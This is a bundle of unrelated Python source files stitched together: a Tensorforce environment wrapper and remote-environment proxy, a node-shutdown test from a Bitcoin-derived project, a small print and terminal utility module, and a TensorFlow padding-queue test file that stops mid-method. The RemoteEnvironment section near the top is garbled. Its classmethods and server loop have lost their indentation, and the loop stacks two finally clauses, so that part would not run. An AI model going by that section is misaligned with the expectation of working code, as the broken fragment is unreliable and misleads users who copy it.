                environment.max_episode_timesteps() < max_episode_timesteps:
            raise TensorforceError.unexpected()
        self._environment = environment
        if max_episode_timesteps is None:
            self._max_episode_timesteps = self._environment.max_episode_timesteps()
        else:
            self._max_episode_timesteps = max_episode_timesteps
            # Monkey-patch the wrapped environment so that it reports the
            # wrapper-imposed limit if it had none of its own.
            if self._environment.max_episode_timesteps() is None:
                self._environment.max_episode_timesteps = (lambda: max_episode_timesteps)
        # Timestep counter within the current episode; None between episodes.
        self._timestep = None
    def __str__(self):
        return str(self._environment)
    def states(self):
        return self._environment.states()
    def actions(self):
        return self._environment.actions()
    def max_episode_timesteps(self):
        return self._max_episode_timesteps
    def close(self):
        return self._environment.close()
    def reset(self):
        self._timestep = 0
        states = self._environment.reset()
        # Shallow-copy dict states so callers cannot mutate internal state.
        if isinstance(states, dict):
            states = states.copy()
        return states
    def execute(self, actions):
        if self._timestep is None:
            raise TensorforceError(
                message="An environment episode has to be initialized by calling reset() first."
            )
        assert self._max_episode_timesteps is None or self._timestep < self._max_episode_timesteps
        states, terminal, reward = self._environment.execute(actions=actions)
        if isinstance(states, dict):
            states = states.copy()
        terminal = int(terminal)
        self._timestep += 1
        # Convert a non-terminal step at the limit into terminal=2 (aborted).
        if terminal == 0 and self._max_episode_timesteps is not None and \
                self._timestep >= self._max_episode_timesteps:
            terminal = 2
        if terminal > 0:
            self._timestep = None
        return states, terminal, reward
    # Attributes handled by the wrapper itself; everything else is proxied.
    _ATTRIBUTES = frozenset([
        '_actions', 'create', '_environment', '_expect_receive', '_max_episode_timesteps',
        '_timestep'
    ])
    def __getattr__(self, name):
        # Only called when normal lookup fails; forward unknown names to
        # the wrapped environment.
        if name in EnvironmentWrapper._ATTRIBUTES:
            return super().__getattr__(name)
        else:
            return getattr(self._environment, name)
    def __setattr__(self, name, value):
        # Wrapper-internal attributes are stored locally; all other writes
        # go to the wrapped environment.
        if name in EnvironmentWrapper._ATTRIBUTES:
            super().__setattr__(name, value)
        else:
            return setattr(self._environment, name, value)
class RemoteEnvironment(Environment):
@classmethod
def proxy_send(cls, connection, function, **kwargs):
raise NotImplementedError
@classmethod
def proxy_receive(cls, connection):
raise NotImplementedError
@classmethod
def proxy_close(cls, connection):
raise NotImplementedError
@classmethod
def remote_send(cls, connection, success, result):
raise NotImplementedError
@classmethod
def remote_receive(cls, connection):
raise NotImplementedError
@classmethod
def remote_close(cls, connection):
raise NotImplementedError
@classmethod
def remote(cls, connection, environment, max_episode_timesteps=None, **kwargs):
try:
env = None
env = Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
while True:
attribute, kwargs = cls.remote_receive(connection=connection)
if attribute in ('reset', 'execute'):
environment_start = time.time()
try:
result = getattr(env, attribute)
if callable(result):
if kwargs is None:
result = None
else:
result = result(**kwargs)
elif kwargs is None:
pass
elif len(kwargs) == 1 and 'value' in kwargs:
setattr(env, attribute, kwargs['value'])
result = None
else:
raise TensorforceError(message="Invalid remote attribute/function access.")
except AttributeError:
if kwargs is None or len(kwargs) != 1 or 'value' not in kwargs:
raise TensorforceError(message="Invalid remote attribute/function access.")
setattr(env, attribute, kwargs['value'])
result = None
if attribute in ('reset', 'execute'):
seconds = time.time() - environment_start
if attribute == 'reset':
result = (result, seconds)
else:
result += (seconds,)
cls.remote_send(connection=connection, success=True, result=result)
if attribute == 'close':
break
except BaseException:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
try:
if env is not None:
env.close()
except BaseException:
pass
finally:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
finally:
cls.remote_close(connection=connection)
def __init__(self, connection, blocking=False):
super().__init__()
self._connection = connection
self._blocking = blocking
self._observation = None
self._thread = None
self._episode_seconds = None
    def send(self, function, kwargs):
        """Send one request to the remote side; exactly one receive() must follow."""
        if self._expect_receive is not None:
            # A previous request is still awaiting its reply: protocol violation.
            assert function != 'close'
            self.close()
            raise TensorforceError.unexpected()
        self._expect_receive = function
        try:
            self.__class__.proxy_send(connection=self._connection, function=function, kwargs=kwargs)
        except BaseException:
            # Transport failure: close the connection before propagating.
            self.__class__.proxy_close(connection=self._connection)
            raise
    def receive(self, function):
        """Receive the reply for the pending `function` request; re-raise remote errors."""
        if self._expect_receive != function:
            # Reply requested for a function that was never sent (or out of order).
            assert function != 'close'
            self.close()
            raise TensorforceError.unexpected()
        self._expect_receive = None
        try:
            success, result = self.__class__.proxy_receive(connection=self._connection)
        except BaseException:
            self.__class__.proxy_close(connection=self._connection)
            raise
        if success:
            return result
        else:
            # Remote side reported a failure: result is (exc_type, value, traceback lines).
            self.__class__.proxy_close(connection=self._connection)
            etype, value, traceback = result
            raise TensorforceError(message='\n{}\n{}: {}`'.format(''.join(traceback), etype, value))
    # Attribute names handled locally on the proxy; everything else is forwarded
    # to the remote environment via send()/receive().
    _ATTRIBUTES = frozenset([
        '_actions', '_blocking', '_connection', 'create', '_episode_seconds', '_expect_receive',
        '_observation', '_thread'
    ])

    def __getattr__(self, name):
        """Read a remote attribute; remote callables come back as proxy functions."""
        if name in RemoteEnvironment._ATTRIBUTES:
            return super().__getattr__(name)
        else:
            self.send(function=name, kwargs=None)
            result = self.receive(function=name)
            if result is None:
                # Remote side reported a callable: wrap it as a kwargs-only proxy.
                def proxy_function(*args, **kwargs):
                    if len(args) > 0:
                        raise TensorforceError(
                            message="Remote environment function call requires keyword arguments."
                        )
                    self.send(function=name, kwargs=kwargs)
                    return self.receive(function=name)
                return proxy_function
            else:
                return result
    def __setattr__(self, name, value):
        """Set local bookkeeping attributes directly; forward all others remotely."""
        if name in RemoteEnvironment._ATTRIBUTES:
            super().__setattr__(name, value)
        else:
            self.send(function=name, kwargs=dict(value=value))
            result = self.receive(function=name)
            assert result is None  # remote attribute assignment returns nothing
    def __str__(self):
        """Return the remote environment's string representation."""
        self.send(function='__str__', kwargs=dict())
        return self.receive(function='__str__')
    def states(self):
        """Return the remote environment's states specification."""
        self.send(function='states', kwargs=dict())
        return self.receive(function='states')
    def actions(self):
        """Return the remote environment's actions specification."""
        self.send(function='actions', kwargs=dict())
        return self.receive(function='actions')
    def max_episode_timesteps(self):
        """Return the remote environment's maximum episode length (or None)."""
        self.send(function='max_episode_timesteps', kwargs=dict())
        return self.receive(function='max_episode_timesteps')
    def close(self):
        """Drain pending work, close the remote environment and the connection."""
        if self._thread is not None:
            # Let any in-flight background reset/execute finish first.
            self._thread.join()
        if self._expect_receive is not None:
            # Consume the outstanding reply so the protocol stays in sync.
            self.receive(function=self._expect_receive)
        self.send(function='close', kwargs=dict())
        self.receive(function='close')
        self.__class__.proxy_close(connection=self._connection)
        self._connection = None
        self._observation = None
        self._thread = None
    def reset(self):
        """Reset the remote environment (blocking); returns the initial states."""
        self._episode_seconds = 0.0
        self.send(function='reset', kwargs=dict())
        # Server returns (states, seconds spent inside the environment).
        states, seconds = self.receive(function='reset')
        self._episode_seconds += seconds
        return states
    def execute(self, actions):
        """Execute `actions` remotely (blocking); returns (states, terminal, reward)."""
        self.send(function='execute', kwargs=dict(actions=actions))
        # Server appends the environment-side seconds to the execute result.
        states, terminal, reward, seconds = self.receive(function='execute')
        self._episode_seconds += seconds
        return states, int(terminal), reward
    def start_reset(self):
        """Begin a reset: synchronous send when blocking, else on a background thread."""
        self._episode_seconds = 0.0
        if self._blocking:
            self.send(function='reset', kwargs=dict())
        else:
            if self._thread is not None:  # TODO: not expected
                self._thread.join()
                self._observation = None
            self._thread = Thread(target=self.finish_reset)
            self._thread.start()
    def finish_reset(self):
        """Background-thread body: perform the reset and stash the observation."""
        assert self._thread is not None and self._observation is None
        # terminal=-1 marks a reset observation (no reward yet).
        self._observation = (self.reset(), -1, None)
        self._thread = None
    def start_execute(self, actions):
        """Begin an execute: synchronous send when blocking, else background thread."""
        if self._blocking:
            self.send(function='execute', kwargs=dict(actions=actions))
        else:
            assert self._thread is None and self._observation is None
            self._thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
            self._thread.start()
    def finish_execute(self, actions):
        """Background-thread body: perform the execute and stash the observation."""
        assert self._thread is not None and self._observation is None
        self._observation = self.execute(actions=actions)
        self._thread = None
    def receive_execute(self):
        """Collect the result of start_reset/start_execute.

        Returns (states, terminal, reward) — terminal is -1 for a reset — or
        None in non-blocking mode while the background thread is still running.
        """
        if self._blocking:
            if self._expect_receive == 'reset':
                states, seconds = self.receive(function='reset')
                self._episode_seconds += seconds
                return states, -1, None
            else:
                states, terminal, reward, seconds = self.receive(function='execute')
                self._episode_seconds += seconds
                return states, int(terminal), reward
        else:
            if self._thread is not None:
                return None  # still in flight
            else:
                assert self._observation is not None
                observation = self._observation
                self._observation = None
                return observation
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test carpinchod shutdown."""
from test_framework.test_framework import CARPINCHOTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
    """Issue a long-poll RPC; on a fresh chain the returned tip height is 0."""
    tip = node.waitfornewblock()
    assert_equal(tip['height'], 0)
class ShutdownTest(CARPINCHOTestFramework):
    """Check that the node shuts down cleanly while an RPC long-poll is in flight."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False

    def run_test(self):
        proxy = get_rpc_proxy(
            self.nodes[0].url, 1, timeout=600,
            coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        proxy.getblockcount()
        Thread(target=test_long_call, args=(proxy,)).start()
        # Wait until the server is executing the above `waitfornewblock`.
        self.wait_until(
            lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)
# Script entry point: run the shutdown test when invoked directly.
if __name__ == '__main__':
    ShutdownTest().main()
|
util.py | from __future__ import print_function # For * **
import sys
import os
def runsep(method, args):  # Run and retrieve process's stdout
    """Run ``method(*args)`` in a child process and return its result.

    The result travels back over a multiprocessing Queue; the queue is
    drained *before* join() so the feeder thread cannot deadlock.

    NOTE(review): the closure target only pickles under the 'fork' start
    method; on 'spawn' platforms (Windows/macOS) this will fail — confirm
    the intended platforms.
    """
    # Bug fix: Queue and Process were used but never imported (the module
    # only imports sys and os), so every call raised NameError.
    from multiprocessing import Process, Queue

    def queue_wrapper(q, params):
        # Child-process body: compute and ship the result back.
        q.put(method(*params))

    q = Queue()
    p = Process(target=queue_wrapper, args=(q, args))
    p.start()
    return_val = q.get()
    p.join()
    return return_val
## Functions
def exit(ec=0):
    """Terminate the interpreter with status `ec` (deliberately shadows the builtin)."""
    raise SystemExit(ec)
def pf(*args, **kwargs):
    """print() followed by an immediate stdout flush."""
    print(*args, **kwargs)
    sys.stdout.flush()
def pfp(*args, **kwargs):
    """Flushed print with no separator between positional arguments."""
    kwargs.setdefault('sep', '')
    print(*args, **kwargs)
    sys.stdout.flush()
def pfl(*args, **kwargs):
    """Flushed print without a trailing newline (line-building helper)."""
    kwargs.setdefault('end', '')
    print(*args, **kwargs)
    sys.stdout.flush()
def pfpl(*args, **kwargs):
    """Flushed print with neither separator nor trailing newline."""
    kwargs.setdefault('sep', '')
    kwargs.setdefault('end', '')
    print(*args, **kwargs)
    sys.stdout.flush()
def eprint(*args, **kwargs):
    """Print to stderr, forwarding all other arguments to print()."""
    print(*args, file=sys.stderr, **kwargs)
def vprint(verbosity, *args, **kwargs):
    """Print via pf() only when the module verbosity is at least `verbosity`.

    Bug fix: the original read the bare global `verbose`, raising NameError
    whenever setverbosity() had not been called first; default to 0 instead.
    """
    if globals().get('verbose', 0) >= verbosity:
        pf(*args, **kwargs)
def setverbosity(v=0):
    """Set the module-global verbosity level consumed by vprint()."""
    global verbose
    verbose = v
def get_linux_terminal():
    """Return the terminal size as (columns, rows).

    Tries TIOCGWINSZ on stdin/stdout/stderr, then on the controlling tty,
    and finally falls back to the LINES/COLUMNS environment variables
    (defaulting to 25 rows x 80 columns).
    """
    env = os.environ

    def ioctl_GWINSZ(fd):
        # struct winsize begins with (rows, cols) as two shorts.
        try:
            import fcntl, termios, struct
            return struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
        except (OSError, ImportError):
            # Narrowed from a bare `except:`: not a tty, or not a Unix platform.
            return None

    cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
    if not cr:
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            try:
                cr = ioctl_GWINSZ(fd)
            finally:
                os.close(fd)  # always release the fd
        except OSError:
            pass
    if not cr:
        # get(key[, default]) instead of a try/catch on the env mapping.
        cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
    # cr is (rows, cols); callers get (cols, rows).
    return int(cr[1]), int(cr[0])
def get_filelen(fn):
    """Return the size of file `fn` in bytes (from its stat record)."""
    return os.stat(fn).st_size
# vim:ts=4 ai
|
padding_fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
class PaddingFIFOQueueTest(test.TestCase):
  def testConstructor(self):
    """A single-component queue's node_def records shapes, capacity, names."""
    with ops.Graph().as_default():
      q = data_flow_ops.PaddingFIFOQueue(
          10, dtypes_lib.float32, ((None,),), name="Q")
      self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
      self.assertProtoEquals("""
        name:'Q' op:'PaddingFIFOQueueV2'
        attr { key: 'component_types' value { list { type: DT_FLOAT } } }
        attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
        attr { key: 'capacity' value { i: 10 } }
        attr { key: 'container' value { s: '' } }
        attr { key: 'shared_name' value { s: '' } }
        """, q.queue_ref.op.node_def)

  def testMultiQueueConstructor(self):
    """Multi-component queue with a shared_name serializes both dtypes."""
    with ops.Graph().as_default():
      q = data_flow_ops.PaddingFIFOQueue(
          5, (dtypes_lib.int32, dtypes_lib.float32), ((), ()),
          shared_name="foo",
          name="Q")
      self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
      self.assertProtoEquals("""
        name:'Q' op:'PaddingFIFOQueueV2'
        attr { key: 'component_types' value { list {
          type: DT_INT32 type : DT_FLOAT
        } } }
        attr { key: 'shapes' value { list { shape { } shape { } } } }
        attr { key: 'capacity' value { i: 5 } }
        attr { key: 'container' value { s: '' } }
        attr { key: 'shared_name' value { s: 'foo' } }
        """, q.queue_ref.op.node_def)
  def testConstructorWithShapes(self):
    """Fully-known TensorShapes are serialized dim-by-dim into the node_def."""
    with ops.Graph().as_default():
      q = data_flow_ops.PaddingFIFOQueue(
          5, (dtypes_lib.int32, dtypes_lib.float32),
          shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
                  tensor_shape.TensorShape([5, 8])),
          name="Q")
      self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
      self.assertProtoEquals("""
        name:'Q' op:'PaddingFIFOQueueV2'
        attr { key: 'component_types' value { list {
          type: DT_INT32 type : DT_FLOAT
        } } }
        attr { key: 'shapes' value { list {
          shape { dim { size: 1 }
                  dim { size: 1 }
                  dim { size: 2 }
                  dim { size: 3 } }
          shape { dim { size: 5 }
                  dim { size: 8 } }
        } } }
        attr { key: 'capacity' value { i: 5 } }
        attr { key: 'container' value { s: '' } }
        attr { key: 'shared_name' value { s: '' } }
        """, q.queue_ref.op.node_def)
  def testEnqueue(self):
    """A single scalar enqueue runs without error."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      enqueue_op = q.enqueue((10.0,))
      enqueue_op.run()

  def testEnqueueWithShape(self):
    """Enqueue enforces the declared static shape; mismatches fail at graph time."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(
          10, dtypes_lib.float32, shapes=((3, 2),))
      enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
      enqueue_correct_op.run()
      with self.assertRaises(ValueError):
        q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
      self.assertEqual(1, q.size().eval())

  def testEnqueueManyWithShape(self):
    """enqueue_many adds one element per leading-dimension slice."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(
          10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
      q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
      self.assertEqual(4, q.size().eval())
  def testParallelEnqueue(self):
    """Concurrent enqueues from many threads are all observed by one dequeuer."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()

      # Run one producer thread for each element in elems.
      def enqueue(enqueue_op):
        sess.run(enqueue_op)

      threads = [
          self.checkedThread(
              target=enqueue, args=(e,)) for e in enqueue_ops
      ]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()

      # Dequeue every element using a single thread.
      results = []
      for _ in xrange(len(elems)):
        results.append(dequeued_t.eval())
      self.assertItemsEqual(elems, results)

  def testParallelDequeue(self):
    """One producer fills the queue; many consumer threads drain it completely."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()

      # Enqueue every element using a single thread.
      for enqueue_op in enqueue_ops:
        enqueue_op.run()

      # Run one consumer thread for each element in elems.
      results = []

      def dequeue():
        results.append(sess.run(dequeued_t))

      threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
      for thread in threads:
        thread.start()
      for thread in threads:
        thread.join()
      self.assertItemsEqual(elems, results)
  def testDequeue(self):
    """Dequeue returns elements in FIFO order."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()

      for enqueue_op in enqueue_ops:
        enqueue_op.run()

      for i in xrange(len(elems)):
        vals = self.evaluate(dequeued_t)
        self.assertEqual([elems[i]], vals)

  def testEnqueueAndBlockingDequeue(self):
    """A dequeue on an empty queue blocks until a producer thread enqueues."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(3, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0]
      enqueue_ops = [q.enqueue((x,)) for x in elems]
      dequeued_t = q.dequeue()

      def enqueue():
        # The enqueue_ops should run after the dequeue op has blocked.
        # TODO(mrry): Figure out how to do this without sleeping.
        time.sleep(0.1)
        for enqueue_op in enqueue_ops:
          sess.run(enqueue_op)

      results = []

      def dequeue():
        for _ in xrange(len(elems)):
          results.append(sess.run(dequeued_t))

      enqueue_thread = self.checkedThread(target=enqueue)
      dequeue_thread = self.checkedThread(target=dequeue)
      enqueue_thread.start()
      dequeue_thread.start()
      enqueue_thread.join()
      dequeue_thread.join()

      for elem, result in zip(elems, results):
        self.assertEqual([elem], result)
  def testMultiEnqueueAndDequeue(self):
    """Tuple components stay paired through enqueue/dequeue in FIFO order."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10,
                                         (dtypes_lib.int32, dtypes_lib.float32),
                                         ((), ()))
      elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
      enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
      dequeued_t = q.dequeue()

      for enqueue_op in enqueue_ops:
        enqueue_op.run()

      for i in xrange(len(elems)):
        x_val, y_val = sess.run(dequeued_t)
        x, y = elems[i]
        self.assertEqual([x], x_val)
        self.assertEqual([y], y_val)

  def testQueueSizeEmpty(self):
    """A freshly constructed queue reports size 0."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      self.assertEqual([0], q.size().eval())

  def testQueueSizeAfterEnqueueAndDequeue(self):
    """size() tracks enqueue (+1) and dequeue (-1); the size tensor is scalar."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      enqueue_op = q.enqueue((10.0,))
      dequeued_t = q.dequeue()
      size = q.size()
      self.assertEqual([], size.get_shape())

      enqueue_op.run()
      self.assertEqual(1, self.evaluate(size))
      dequeued_t.op.run()
      self.assertEqual(0, self.evaluate(size))
  def testEnqueueMany(self):
    """Running the same enqueue_many op twice appends the batch twice."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue()
      enqueue_op.run()
      enqueue_op.run()

      for i in range(8):
        vals = self.evaluate(dequeued_t)
        self.assertEqual([elems[i % 4]], vals)

  def testEmptyEnqueueMany(self):
    """Enqueuing a zero-length batch is a no-op: the size stays 0."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, (
          (None, None),))
      empty_t = constant_op.constant(
          [], dtype=dtypes_lib.float32, shape=[0, 2, 3])
      enqueue_op = q.enqueue_many((empty_t,))
      size_t = q.size()

      self.assertEqual([0], self.evaluate(size_t))
      enqueue_op.run()
      self.assertEqual([0], self.evaluate(size_t))

  def testEmptyDequeueMany(self):
    """dequeue_many(0) returns an empty tensor whether or not data is queued."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, shapes=((),))
      enqueue_op = q.enqueue((10.0,))
      dequeued_t = q.dequeue_many(0)

      self.assertEqual([], self.evaluate(dequeued_t).tolist())
      enqueue_op.run()
      self.assertEqual([], self.evaluate(dequeued_t).tolist())
  def testEmptyDequeueManyWithDynamicShape(self):
    """dequeue_many(0) also works when the component shape is partially unknown."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(
          10, dtypes_lib.float32, shapes=((None,),))
      enqueue_op = q.enqueue(([10.0],))
      dequeued_t = q.dequeue_many(0)

      self.assertEqual([], self.evaluate(dequeued_t).tolist())
      enqueue_op.run()
      self.assertEqual([], self.evaluate(dequeued_t).tolist())

  def testEmptyDequeueUpToWithDynamicShape(self):
    """dequeue_up_to(0) mirrors dequeue_many(0) for dynamic shapes."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(
          10, dtypes_lib.float32, shapes=((None,),))
      enqueue_op = q.enqueue(([10.0],))
      dequeued_t = q.dequeue_up_to(0)

      self.assertEqual([], self.evaluate(dequeued_t).tolist())
      enqueue_op.run()
      self.assertEqual([], self.evaluate(dequeued_t).tolist())

  def testConstructPaddingFIFOQueueWithNoShape(self):
    """Omitting shapes entirely is rejected: padding queues require shape info."""
    with self.cached_session():
      with self.assertRaisesRegexp(
          ValueError,
          r"When providing partial shapes, a list of shapes must be provided."):
        data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32,
                                       None).queue_ref.eval()
  def testMultiEnqueueMany(self):
    """enqueue_many with two components keeps the per-element pairing."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(10,
                                         (dtypes_lib.float32, dtypes_lib.int32),
                                         ((), (2,)))
      float_elems = [10.0, 20.0, 30.0, 40.0]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue()

      enqueue_op.run()
      enqueue_op.run()

      for i in range(8):
        float_val, int_val = sess.run(dequeued_t)
        self.assertEqual(float_elems[i % 4], float_val)
        self.assertAllEqual(int_elems[i % 4], int_val)

  def testMultiEnqueueManyWithPartiallyKnownShapes(self):
    """Same pairing behavior with a partially-known (None,) component shape."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(
          10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
      float_elems = [10.0, 20.0, 30.0, 40.0]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue()

      enqueue_op.run()
      enqueue_op.run()

      for i in range(8):
        float_val, int_val = sess.run(dequeued_t)
        self.assertEqual(float_elems[i % 4], float_val)
        self.assertAllEqual(int_elems[i % 4], int_val)
  def testDequeueMany(self):
    """dequeue_many(4) yields consecutive FIFO batches."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_many(4)

      enqueue_op.run()

      self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
      self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))

  def testDequeueUpToNoBlocking(self):
    """dequeue_up_to(4) behaves like dequeue_many when enough data is present."""
    with self.cached_session():
      q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
      elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
      enqueue_op = q.enqueue_many((elems,))
      dequeued_t = q.dequeue_up_to(4)

      enqueue_op.run()

      self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
      self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
  def testMultiDequeueMany(self):
    """Batched dequeue of a two-component queue preserves static batch shapes."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(
          10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
      float_elems = [
          10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
      ]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
                   [15, 16], [17, 18], [19, 20]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue_many(4)
      dequeued_single_t = q.dequeue()

      enqueue_op.run()

      float_val, int_val = sess.run(dequeued_t)
      self.assertAllEqual(float_elems[0:4], float_val)
      self.assertAllEqual(int_elems[0:4], int_val)
      self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
      self.assertEqual(int_val.shape, dequeued_t[1].get_shape())

      float_val, int_val = sess.run(dequeued_t)
      self.assertAllEqual(float_elems[4:8], float_val)
      self.assertAllEqual(int_elems[4:8], int_val)

      float_val, int_val = sess.run(dequeued_single_t)
      self.assertAllEqual(float_elems[8], float_val)
      self.assertAllEqual(int_elems[8], int_val)
      self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
      self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())

  def testMultiDequeueManyWithPartiallyKnownShapes(self):
    """With (None,) shapes the dequeued values remain shape-compatible."""
    with self.cached_session() as sess:
      q = data_flow_ops.PaddingFIFOQueue(
          10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
      float_elems = [
          10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
      ]
      int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
                   [15, 16], [17, 18], [19, 20]]
      enqueue_op = q.enqueue_many((float_elems, int_elems))
      dequeued_t = q.dequeue_many(4)
      dequeued_single_t = q.dequeue()

      enqueue_op.run()

      float_val, int_val = sess.run(dequeued_t)
      self.assertAllEqual(float_elems[0:4], float_val)
      self.assertAllEqual(int_elems[0:4], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(float_val.shape).is_compatible_with(
              dequeued_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(dequeued_t[
              1].get_shape()))

      float_val, int_val = sess.run(dequeued_t)
      self.assertAllEqual(float_elems[4:8], float_val)
      self.assertAllEqual(int_elems[4:8], int_val)

      float_val, int_val = sess.run(dequeued_single_t)
      self.assertAllEqual(float_elems[8], float_val)
      self.assertAllEqual(int_elems[8], int_val)
      self.assertTrue(
          tensor_shape.TensorShape(float_val.shape).is_compatible_with(
              dequeued_single_t[0].get_shape()))
      self.assertTrue(
          tensor_shape.TensorShape(int_val.shape).is_compatible_with(
              dequeued_single_t[1].get_shape()))
  def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
    """Variable-length elements are right-padded (b'' / 0) in batched dequeues."""
